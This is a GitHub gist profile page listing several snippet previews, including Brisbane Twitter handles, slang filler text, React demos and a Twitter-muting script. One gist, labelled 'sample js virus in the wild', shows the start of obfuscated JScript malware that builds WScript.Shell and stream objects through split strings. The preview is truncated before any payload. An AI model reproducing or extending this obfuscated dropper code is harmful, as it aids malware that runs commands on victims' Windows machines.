Skip to content

Instantly share code, notes, and snippets.

View phocks's full-sized avatar
🦖
"Rrrrrraaaawwwwwr!!" —A dinosaur

Joshua Byrd phocks

🦖
"Rrrrrraaaawwwwwr!!" —A dinosaur
View GitHub Profile
@phocks
phocks / following-list-sorted.lst
Last active April 1, 2016 13:15
Brisbane Twitter Usernames
#list of people tweeting in brisbane
0092991
009Rae
0114kyohei
01D7oom
036cd686bc1a4dc
0402595022a
0411makikkuma
0509yy
0516pikari
@phocks
phocks / learnyounode-aussie.txt
Created March 12, 2015 04:45
learnyounode my first i/o aussie slang
[ 'Get a dog up ya strewth where he\'s got a massive cab sav. Mad as a spit the dummy when he hasn\'t got a cubby house. Stands out like a billy how shazza got us some bogan. As cross as a roo bar also flat out like a relo. As cunning as a frog in a sock when she\'ll be right pav. Get a dog up ya franger with grab us a thongs. As cunning as a fair go how as dry as a g\'day.',
'Get a dog up ya kindie mate as dry as a dipstick. She\'ll be right mates mate flat out like a dob. Grab us a dunny how he hasn\'t got a rapt. As cunning as a bazza when shazza got us some rubbish. As stands out like bull bar mate he\'s got a massive struth. As dry as a pot how gutful of bail up. She\'ll be right beauty to he\'s got a massive billy. Lets throw a cobber no dramas you little ripper struth.',
'Built like a scratchy my watch out for the greenie. Lets throw a postie and watch out for the crook. She\'ll be right bathers when he\'s got a massive servo. She\'ll be right top end bloody stands out like a sook. He\'s got a mass
@phocks
phocks / statement.js
Last active November 25, 2015 00:32
sample js virus in the wild
(function (acMRvoX) {
function ULkwjGJGnWG(ubLrFIZDoYnE)
{
return new acMRvoX.ActiveXObject(ubLrFIZDoYnE)
}
var WuLhqkJdtaacjb = true, jkFZqNhrYZWkwl = ("B.St"+(993982, "ream"));
var PnPtHKXuORqDqyM;
PnPtHKXuORqDqyM = function (HdjxVffbRet, KuRguBRxAJGxrhe, JLKatIaUwWO) {
TUIakctOdZrinn=((1/*s921510nuM400235eOiZ*/)?"WScri":"")+"pt.Shell";
var KHSlcydxPLl = ULkwjGJGnWG(TUIakctOdZrinn);
@phocks
phocks / featurebg.css
Created April 13, 2016 06:17 — forked from JanHoek/featurebg.css
CSS for a Widget Area with Featured image as background
.features {
background: url(images/default-featurebg.jpg) no-repeat center top;
clear: both;
min-height: 450px;
padding: 2%;
}
.features-widgetarea {
padding: 2%;
float: right;
@phocks
phocks / main.js
Last active December 10, 2016 11:01
Node script that mutes all the people you are following on Twitter
// npm install twit
var Twit = require('twit')
// Get these from apps.twitter.com
var T = new Twit({
  consumer_key:         'put your consumer key here',
  consumer_secret:      'put your consumer secret here',
  access_token:         'put your access token here',
  access_token_secret:  'put your access token secret here',
  timeout_ms:           60*1000,  // optional HTTP request timeout to apply to all requests. 
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>Hello World</title>
<script crossorigin src="https://unpkg.com/react@16/umd/react.development.js"></script>
<script crossorigin src="https://unpkg.com/react-dom@16/umd/react-dom.development.js"></script>
<script src="https://unpkg.com/babel-standalone@6.15.0/babel.min.js"></script>
</head>
<body>
@phocks
phocks / random-react.html
Last active February 22, 2021 15:56
Learning react. This is a random number generator. Real simple.
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>Random</title>
<script crossorigin src="https://unpkg.com/react@16/umd/react.development.js"></script>
<script crossorigin src="https://unpkg.com/react-dom@16/umd/react-dom.development.js"></script>
<script src="https://unpkg.com/babel-standalone@6.15.0/babel.min.js"></script>
<style>
html {
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
the default network 3.1
http://thedefaultnetwork.tumblr.com/
tumblr theme #33653
http://www.tumblr.com/theme/33653
included plugins
fidvids v 1.0
infinite scroll v 2.0b2.110713
@phocks
phocks / .block
Last active July 6, 2017 03:43 — forked from mbostock/.block
Australia Map
border: no
license: gpl-3.0
@phocks
phocks / .block
Last active July 31, 2017 05:52
Barcode chart
license: mit
height: 200